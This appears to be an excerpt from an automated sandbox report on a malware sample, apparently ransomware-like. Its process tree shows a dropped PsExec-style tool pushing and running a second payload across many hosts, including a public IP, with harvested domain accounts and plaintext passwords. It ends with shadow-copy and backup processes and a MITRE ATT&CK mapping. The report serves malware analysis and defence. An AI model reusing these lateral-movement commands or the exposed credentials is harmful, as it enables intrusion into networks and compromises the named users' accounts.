  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4340
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4432
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1996
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4840
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1332
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2828
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\154.61.71.51 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:3124
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1452
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2228
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:5096
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2964
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:5076
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1084
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:360
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4496
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2008
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2280
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:4208
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2460
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:3088
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:3056
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:3064
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\igmp.mcast.net -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2368
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.22 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:936
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\igmp.mcast.net -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2984
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.22 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2988
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\igmp.mcast.net -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:916
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.22 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:3144
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\igmp.mcast.net -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:3944
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.22 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2592
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\igmp.mcast.net -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:4016
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:4288
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.22 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:3720
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:4000
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:4824
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:2632
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:4004
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:4276
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:4268
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:268
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.255.255 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:4404
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:2496
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:2824
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:2512
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:2196
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:2956
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:4584
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\239.255.255.250 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:5060
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:4740
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:1112
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\224.0.0.252 -u "WW930\A688846" -p "BeHappy!" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:2384
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\154.61.71.51 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:4464
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:4536
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\154.61.71.51 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:1236
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\154.61.71.51 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:936
- C:\Users\Admin\AppData\Local\Temp\_tjv.exe
  C:\Users\Admin\AppData\Local\Temp\_tjv.exe \\10.127.0.1 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_hwy.exe"
  2⤵
  PID:2984

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4328

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4896

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:868

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:420

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Indicator Removal on Host

T1070

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3052-120-0x0000000010000000-0x00000000100AA000-memory.dmp

Filesize
680KB

Download
memory/3512-127-0x0000000180000000-0x000000018002B000-memory.dmp

Filesize
172KB

Download